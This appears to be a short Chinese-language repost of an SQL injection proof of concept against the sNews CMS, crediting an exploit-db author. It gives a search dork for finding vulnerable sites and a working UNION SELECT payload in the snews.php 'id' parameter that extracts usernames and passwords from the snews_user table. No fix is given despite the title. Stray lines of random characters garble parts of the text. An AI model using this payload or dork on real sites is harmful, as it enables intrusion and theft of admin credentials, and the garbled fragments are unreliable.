CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
作者: By onestree
下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
关键词: inurl:"tanyakan pada rumput yang bergoyang"


% v* v: Y7 P- E2 i' A*************************************************************
4 d* Y4 V* o. F. U2 \9 |3 l: J
SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

示例

% a* Z8 `8 V, y6 `; b2 f: Vhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


致谢:

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
0 L) o2 \  b/ V5 M  _. `     
          indonesiancoder - moeslimh4x0r - go-coder

3 ~5 Q- N% n8 bspesial my hunny :*